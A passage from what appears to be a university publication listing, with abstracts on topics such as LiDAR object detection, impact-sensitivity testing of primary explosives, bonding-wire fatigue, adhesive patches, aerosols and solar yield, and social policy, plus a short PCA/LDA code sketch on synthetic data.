In the field of autonomous robotics, sensors have played a major role in defining the scope of the technology and, to a great extent, its limitations as well. This cycle of constant updates and hence technological advancement has given birth to industries that were once inconceivable. Industries like autonomous driving, which have a serious impact on people's safety and security, also have equally significant implications for the dynamics and economics of the market. With sensors like LiDAR and RADAR delivering 3D measurements as point clouds, there is a need to process the raw measurements directly, and many research groups are working on this. Sizable research has gone into solving the task of object detection on 2D images. In this thesis we aim to develop a LiDAR-based 3D object detection scheme. We combine the ideas of PointPillars and feature pyramid networks from 2D vision to propose Pillar-FPN. The proposed method directly takes 3D point clouds as input and outputs a 3D bounding box. Our pipeline consists of multiple variations of the proposed Pillar-FPN at the feature fusion level, which are described in the results section. We have trained our model on the KITTI train dataset and evaluated it on the KITTI validation dataset.
A precise characterization of substances is essential for the safe handling of explosives. One parameter regularly characterized is the impact sensitivity. This is typically determined using a drop hammer. However, the results can vary depending on the test method and even the operator, and it is not possible to distinguish the type of decomposition such as detonation and deflagration. This study monitors the reaction progress by constructing a drop hammer to measure the decomposition reaction of four different primary explosives (tetrazene, silver azide, lead azide, lead styphnate) in order to determine the reproducibility of this method. Additionally, further possible evaluation methods are explored to improve on the current binary statistical analysis. To determine whether classification was possible based on extracted features, the responses of equipped sensor arrays, which measure and monitor the reactions, were studied and evaluated. Features were extracted from this data and were evaluated using multivariate methods such as principal component analysis (PCA) and linear discriminant analysis (LDA). The results indicate that although the measurements show substance specific trends, they also show a large scatter for each substance. By reducing the dimensions of the extracted features, different sample clusters can be represented and the calculated loadings allow significant parameters to be determined for classification. The results also suggest that differentiation of different reaction mechanisms is feasible. Testing of the regressor function shows reliable results considering the comparatively small amount of data.
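For readers unfamiliar with the multivariate step described above, here is a compact scikit-learn sketch applying PCA (with loadings) and LDA to a synthetic stand-in for the extracted drop-hammer features; the data, the number of classes and all settings are illustrative assumptions only.

```python
import numpy as np
from sklearn.decomposition import PCA
from sklearn.discriminant_analysis import LinearDiscriminantAnalysis
from sklearn.preprocessing import StandardScaler

# Hypothetical feature matrix: rows = drop-hammer experiments, columns = features
# extracted from the sensor arrays; labels = substance identity (4 classes).
rng = np.random.default_rng(0)
X = rng.normal(size=(80, 12)) + np.repeat(np.arange(4), 20)[:, None] * 0.8
y = np.repeat(np.arange(4), 20)

X_std = StandardScaler().fit_transform(X)

# Unsupervised dimension reduction: scores for cluster plots, loadings for interpretation.
pca = PCA(n_components=2).fit(X_std)
scores = pca.transform(X_std)
print("explained variance:", pca.explained_variance_ratio_)
print("loadings (PC1):", pca.components_[0])   # which features drive the separation

# Supervised projection and classification of the same features.
lda = LinearDiscriminantAnalysis(n_components=2).fit(X_std, y)
print("LDA training accuracy:", lda.score(X_std, y))
```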
Bonding wires made of aluminum are the most used materials for the transmission of electrical signals in power electronic devices. During operation, different cyclic mechanical and thermal stresses can lead to fatigue loads and a failure of the bonding wires. A prediction or prevention of the wire failure is not yet possible by design for all cases. The following work presents meaningful fatigue tests in small wire dimensions and investigates the influence of the R-ratio on the lifetime of two different aluminum wires with a diameter of 300 μm each. The experiments show very reproducible fatigue results with ductile failure behavior. The endurable stress amplitude decreases linearly with an increasing stress ratio, which can be displayed by a Smith diagram, even though the applied maximum stresses exceed the initial yield stresses determined by tensile tests. A scaling of the fatigue results by the tensile strength indicates that the fatigue level is significantly influenced by the strength of the material. Due to the very consistent findings, the development of a generalized fatigue model for predicting the lifetime of bonding wires with an arbitrary loading situation seems to be possible and will be further investigated.
The utilization of simulation procedures is gaining increasing attention in the product development of extrusion blow molded parts. However, some simulation steps, like the simulation of shrinkage and warpage, are still associated with uncertainties. The reason for this is, on the one hand, a lack of standardized interfaces for the transfer of simulation data between different simulation tools and, on the other hand, the complex time-, temperature- and process-dependent material behavior of the semi-crystalline polymers used. Using a new vendor-neutral interface standard for the data transfer, the shrinkage analysis of a simple blow molded part is investigated and compared to experimental data. A linear viscoelastic material model in combination with an orthotropic process- and temperature-dependent thermal expansion coefficient is used for the shrinkage prediction. A good agreement is observed. Finally, critical parameters in the simulation models that strongly influence the shrinkage analysis are identified by a sensitivity study.
Characterization methods of pressure sensitive adhesives (PSA) originate from technical bonding and do not cover relevant data for the development and quality assurance of medical applications, where PSAs with flexible backing layers are applied to human skin. In this study, a new method called RheoTack is developed to determine, mechanically and optically, the adhesion and detaching behavior of flexible and transparent PSA-based patches. Transdermal therapeutic systems (TTS) consisting of silicone-based PSAs on a flexible and transparent backing layer were tested on a rotational rheometer with an 8 mm plate as a probe rod at retraction speeds of 0.01, 0.1, and 1 mm/s with respect to their adhesion and detaching behavior in terms of force-retraction displacement curves. The curves consist of a compression phase to affirm wetting; a tensile deformation phase capturing stretching, cavity formation, and fibril formation; and a failure phase with detaching. Their analysis provides values for the stiffness, the force and displacement at the beginning of fibril formation, the force and displacement at the beginning of failure due to fibril breakage and detaching, as well as the corresponding activation energies. All these parameters exhibit a pronounced dependency on the retraction speed. The force-retraction displacement curves, together with the simultaneous video recordings of the TTS deformation from three different angles (three cameras), provide deeper insight into the deformation processes and allow for interpreting the characteristics relevant for PSA applications.
West Africa has great potential for the use of solar energy systems, as it has both a high solar radiation rate and a lack of energy production. West Africa is also a very aerosol-rich region; the effects of aerosols on photovoltaic (PV) use depend both on atmospheric conditions and on the solar technology employed. This study reports the variability of aerosol optical properties in the city of Koforidua, Ghana over the period 2016 to 2020, and their impact on the radiation intensity and efficiency of a PV cell. The study used AERONET ground-based data (Giles et al., 2019) and satellite data produced by CAMS (Gschwind et al., 2019), which both provide aerosol optical depth (AOD) and meteorological parameters used for radiative transfer calculations with libRadtran (Emde et al., 2016). A spectrally resolved PV model (Herman-Czezuch et al., 2022) is then used to calculate the PV yield of two PV technologies: polycrystalline and amorphous silicon. It is observed that for both data sets, the aerosol is mainly composed of dust and organic matter, with a strongly increased AOD load during the harmattan period (December-February), partly due to the fires observed during this period.
In her recent article, Bender discusses several aspects of research–practice–collaborations (RPCs). In this commentary, we apply Bender's arguments to experiences in engineering research and development (R&D). We investigate the influence of interaction with practice partners on relevance, credibility, and legitimacy in the special engineering field of product development and analyze which methodological approaches are already being pursued for dealing with diverging interests and asymmetries and which steps will be necessary to include interests of civil society beyond traditional customer relations.
Effective Neighborhood Feature Exploitation in Graph CNNs for Point Cloud Object-Part Segmentation
(2022)
Part segmentation is the task of semantic segmentation applied to objects and has a wide range of applications, from robotic manipulation to medical imaging. This work deals with the problem of part segmentation on raw, unordered point clouds of 3D objects. While pioneering works on deep learning for point clouds typically ignore the local geometric structure around individual points, the subsequent methods proposed to extract features by exploiting local geometry have not yielded significant improvements either. In order to investigate further, a graph convolutional network (GCN) is used in this work in an attempt to increase the effectiveness of such neighborhood feature exploitation approaches. Most of the previous works also focus only on segmenting complete point cloud data. Considering the impracticality of such approaches in real-world scenarios, where complete point clouds are scarcely available, this work proposes approaches to deal with partial point cloud segmentation.
In the attempt to better capture neighborhood features, this work proposes a novel method to learn regional part descriptors which guide and refine the segmentation predictions. The proposed approach helps the network achieve state-of-the-art performance of 86.4% mIoU on the ShapeNetPart dataset for methods which do not use any preprocessing techniques or voting strategies. In order to better deal with partial point clouds, this work also proposes new strategies to train and test on partial data. While achieving significant improvements compared to the baseline performance, the problem of partial point cloud segmentation is also viewed through an alternate lens of semantic shape completion.
Semantic shape completion networks not only help deal with partial point cloud segmentation but also enrich the information captured by the system by predicting complete point clouds with corresponding semantic labels for each point. To this end, a new network architecture for semantic shape completion is also proposed based on point completion network (PCN) which takes advantage of a graph convolution based hierarchical decoder for completion as well as segmentation. In addition to predicting complete point clouds, results indicate that the network is capable of reaching within a margin of 5% to the mIoU performance of dedicated segmentation networks for partial point cloud segmentation.
The research examines Generation Z’s (Gen Z’s) attitudes, behavior and awareness regarding sustainability-oriented products in two European countries, located in the region of Western Balkans, Bosnia–Herzegovina and Serbia. The research deploys generational cohort theory (GCT) and a quantitative analysis of primary data collected through an online questionnaire among 1338 primary, high school and university students, all belonging to Generation Z. It deploys a Confirmatory Factor Analysis (CFA) by running both Maximum Likelihood (ML) and Markov Chain Monte Carlo (MCMC) procedures, the latter being suitable for binary variables, which have been deployed in the study. The results of MLCFA provide evidence that there is a statistically significant and relatively strong relation between sustainability and circular economy attitudes (SCEA) and sustainability and circular economy behavior (SCEB), while there is a statistically insignificant and relatively weak relation between sustainability and circular economy behavior (SCEB) and circular economy awareness (CEW). The results of the BCFA, which is based on MCMC procedure, are similar to the results based on a rather commonly used MLCFA procedure. The results also confirm that Gen Z knows more about the companies which recycle products than it does about the CE as a concept, while the vast majority is concerned about the future of the planet and is motivated to learn more about the CE through CE and various awareness-raising measures.
Technical aspects are typically brought into focus when thinking about inclusion opportunities and exclusion risks in digital learning scenarios. However, focussing on technical limitations is not sufficient. This contribution describes another important field of inclusion, namely psychological personality traits. In a longitudinal study at the Hochschule Bonn-Rhein-Sieg (H-BRS), University of Applied Sciences, we accompanied a civil law lecture of a bachelor's degree programme, which had been digitalized because of COVID-19, with empirical Scholarship of Teaching and Learning methods over two semesters. N=55 students from the first semester measured and N=35 from the second rated the different digital teaching methods used in the developed digital learning scenario. Their personality traits according to the five-factor model were measured using a validated psychometric short scale (BFI-10). Moderate to large empirical effects of the students' personality traits on the assessments of the different digital teaching methods were observed. Neuroticism influences the perception of course difficulty and the preference for using an instant messenger as a central communication platform, where students can interact with fellow students and lecturers in a way they are used to from their daily lives. High conscientiousness predicts a more regular completion of the weekly tasks given throughout the semester, while higher extraversion is associated with a preference for synchronous video conference sessions and active webcams. Higher agreeableness is associated with rating the learning atmosphere as more constructive, while low values are associated with perceiving more negative consequences from the reduced contact with fellow students caused by COVID-19 restrictions. No correlations were observed between the openness dimension and any ratings of digital teaching methods. With this insight into our students' personality traits, we were able to match the digital teaching methods used in our digital learning scenario to the psychological needs of our students, which resulted in a higher level of inclusion and a reduction of exclusion risks.
Hydrogen‐Bonded Cholesteric Liquid Crystals—A Modular Approach Toward Responsive Photonic Materials
(2022)
A supramolecular approach for photonic materials based on hydrogen-bonded cholesteric liquid crystals is presented. The modular toolbox of low-molecular-weight hydrogen-bond donors and acceptors provides a simple route toward liquid crystalline materials with tailor-made thermal and photonic properties. Initial studies reveal broad application potential of the liquid crystalline thin films for chemo- and thermosensing. The chemosensing performance is based on the interruption of the intermolecular forces between the donor and acceptor moieties by interference with halogen-bond donors. Future studies will expand the scope of analytes and sensing in aqueous media. In addition, the implementation of the reported materials in additive manufacturing and printed photonic devices is planned.
Using a life-cycle approach, we identify key gaps for social reform in Georgia. The reduction of informal work is the most pressing of these, since formal employment is the backbone of any robust and reliable social insurance scheme. At the same time, greater financial resources are required through taxation in order to enable systematic social reform in Georgia. Both interventions are needed in order to fill the gaps in the current social protection system, which include the limited scope of pension and health insurance, as well as the lack of permanent unemployment insurance and universal child benefits.
Against the background of Germany’s long experience with social protection, we outline the main principles of the German welfare state and present the design of three main social insurance branches (pensions, health and unemployment). Based on the mixed experience that has emerged in Germany, in particular due to path dependencies and political deadlock, we derive lessons that inform a clear and coherent vision for social reform in Georgia.
There is an unmet need for the development and validation of biomarkers and surrogate endpoints for clinical trials in propionic acidemia (PA) and methylmalonic acidemia (MMA). This review examines the pathophysiology and clinical consequences of PA and MMA that could form the basis for potential biomarkers and surrogate endpoints. Changes in primary metabolites such as methylcitric acid (MCA), the MCA:citric acid ratio, oxidation of 13C-propionate (exhaled 13CO2), and propionylcarnitine (C3) have demonstrated clinical relevance in patients with PA or MMA. Methylmalonic acid, another primary metabolite, is a potential biomarker, but only in patients with MMA. Other potential biomarkers in patients with either PA or MMA include secondary metabolites, such as ammonium, or the mitochondrial disease marker fibroblast growth factor 21. Additional research is needed to validate these biomarkers as surrogate endpoints, and to determine whether other metabolites or markers of organ damage could also be useful biomarkers for clinical trials of investigational drug treatments in patients with PA or MMA. This review examines the evidence supporting a variety of possible biomarkers for drug development in propionic and methylmalonic acidemias.
From Conclusion to Coda
(2022)